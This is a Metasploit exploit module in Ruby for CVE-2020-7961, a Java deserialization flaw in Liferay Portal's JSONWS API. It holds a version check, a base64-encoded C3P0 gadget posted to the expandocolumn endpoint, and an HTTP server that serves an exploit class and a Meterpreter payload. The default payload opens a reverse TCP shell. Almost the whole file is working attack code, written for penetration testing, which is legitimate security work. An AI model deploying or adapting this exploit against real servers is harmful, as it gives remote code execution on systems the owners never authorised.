metasploit-gs/modules/exploits/multi/http/liferay_java_unmarshalling.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Liferay Portal Java Unmarshalling via JSONWS RCE',
      'Description'    => %q{
        This module exploits a Java unmarshalling vulnerability via JSONWS in
        Liferay Portal < 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2 to execute code
        as the Liferay user.
      },
      'Author'         => [
        'Code White',       # Discovery
        'Thomas Etrillard', # PoC
        'wvu'               # Module
      ],
      'References'     => [
        ['CVE', '2020-7961'],
        ['URL', 'https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html'],
        ['URL', 'https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html']
      ],
      'DisclosureDate' => '2019-11-25', # Vendor advisory
      'License'        => MSF_LICENSE,
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Privileged'     => false,
      'Targets'        => [
        ['Liferay Portal < 6.2 GA6, 7.0 GA7, 7.1 GA4, 7.2 GA2', {}]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_tcp'},
      'Notes'          => {
        'Stability'    => [CRASH_SAFE],
        'Reliability'  => [REPEATABLE_SESSION],
        'SideEffects'  => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      },
      'Stance'         => Stance::Aggressive
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])

    deregister_options('URIPATH')
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path)
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.code == 200 && res.headers['Liferay-Portal']
      return CheckCode::Unknown(
        'Target did not respond with Liferay-Portal header.'
      )
    end

=begin https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java
       https://github.com/liferay/liferay-portal/blob/master/release.properties

    HTTP/1.1 200
    [snip]
    Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)
    [snip]
=end
    version, build =
      res.headers['Liferay-Portal'].scan(
        /^Liferay Community Edition Portal ([\d.]+ CE GA\d+).*Build (\d+)/
      ).flatten

    unless version && build
      return CheckCode::Unknown(
        'Target did not respond with Liferay version and build.'
      )
    end

    # TODO: Check each supported build range
    if Gem::Version.new(build) < Gem::Version.new('7201')
      return CheckCode::Appears(
        "Liferay #{version} MAY be a vulnerable version. Please verify."
      )
    end

    CheckCode::Safe("Liferay #{version} is NOT a vulnerable version.")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    # Start our HTTP server to provide remote classloading
    ssl = datastore['SSL']
    datastore['SSL'] = false
    start_service('Path' => '/')
    datastore['SSL'] = ssl

    print_status('Sending go-go-gadget for remote classloading')

    send_request_gadget(normalize_uri(
      target_uri.path,
      '/api/jsonws/expandocolumn/update-column'
    ))
  end

  def send_request_gadget(uri)
    # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
    vars_post = {
      'columnId' => rand(8..42),
      'name'     => rand(8..42),
      'type'     => rand(8..42)
    }

    vars_post['+defaultData'] =
      'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource'

    vars_post['defaultData.userOverridesAsString'] =
      "HexAsciiSerializedMap:#{go_go_gadget.unpack1('H*')};"

    send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'vars_post' => vars_post
    }, 0)
  end

  def on_request_uri(cli, request)
    vprint_status("#{request.method} #{request.uri} requested")

    unless %w[HEAD GET].include?(request.method)
      vprint_error("Ignoring #{request.method} request")
      return
    end

    if request.method == 'HEAD'
      whitelist = %W[
        /#{class_name}.class
        /metasploit/Payload.class
        /metasploit.dat
      ]

      unless whitelist.include?(request.uri)
        vprint_error('Sending 404')
        return send_not_found(cli)
      end

      vprint_good('Sending 200')
      return send_response(cli, '')
    end

    case request.uri
    # Stage 1
    when "/#{class_name}.class"
      vprint_good('Sending exploit class')
      res = exploit_class
    # Stage 2
    when '/metasploit/Payload.class'
      vprint_good('Sending payload class')
      res = MetasploitPayloads.read('java/metasploit/Payload.class')
    # Stage 3
    when '/metasploit.dat'
      vprint_good('Sending payload config')
      res = payload_instance.stager_config
    else
      vprint_error('Sending bogus file')
      return send_response(cli, "#{Faker::Hacker.say_something_smart}\n")
    end

    send_response(
      cli,
      res,
      # file -I says application/x-java-applet, but I don't believe it
      'Content-Type' => 'application/octet-stream'
    )
  end

  # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
  def go_go_gadget
    # https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
    gadget = Rex::Text.decode_base64(
      <<~EOF
        rO0ABXNyAD1jb20ubWNoYW5nZS52Mi5uYW1pbmcuUmVmZXJlbmNlSW5kaXJlY3RvciRSZWZl
        cmVuY2VTZXJpYWxpemVkYhmF0NEqwhMCAARMAAtjb250ZXh0TmFtZXQAE0xqYXZheC9uYW1p
        bmcvTmFtZTtMAANlbnZ0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMAARuYW1lcQB+AAFMAAly
        ZWZlcmVuY2V0ABhMamF2YXgvbmFtaW5nL1JlZmVyZW5jZTt4cHBwcHNyABZqYXZheC5uYW1p
        bmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wA
        DGNsYXNzRmFjdG9yeXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAFGNsYXNzRmFjdG9yeUxvY2F0
        aW9ucQB+AAdMAAljbGFzc05hbWVxAH4AB3hwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuv
        AQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0
        ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFuZy5PYmplY3Q7
        kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQAAEhBQ0t0AABUSEV0AABQTEFORVQ=
      EOF
    )

    # Replace length-prefixed placeholder strings with our own
    gadget.sub!(/.HACK/,  packed_class_name)
    gadget.sub!(/.THE/,   packed_get_uri)
    gadget.sub(/.PLANET/, packed_class_name)
  end

=begin javac Exploit.java
  import metasploit.Payload;
  public class Exploit {
      public Exploit(){
          try {
              Payload.main(null);
          } catch (Exception e) { }

      }
  }
=end
  def exploit_class
    klass = Rex::Text.decode_base64(
      <<~EOF
        yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAN
        U3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNqYXZhL2xhbmcvRXhjZXB0aW9u
        AQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmplY3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARt
        YWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3
        AAEAAgAAAA0qtwABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL
        AAAA
      EOF
    )

    # Replace length-prefixed string "Exploit" with a random one
    klass.sub(/.Exploit/, packed_class_name)
  end

  def class_name
    @class_name ||= rand_text_alpha(8..42).capitalize
  end

  def packed_class_name
    "#{[class_name.length].pack('C')}#{class_name}"
  end

  def packed_get_uri
    "#{[get_uri.length].pack('C')}#{get_uri}"
  end

end